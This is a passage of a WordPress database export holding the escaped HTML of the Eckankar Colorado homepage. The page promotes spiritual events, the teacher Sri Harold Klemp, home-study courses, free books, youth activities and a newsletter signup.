Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236914,40270,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" 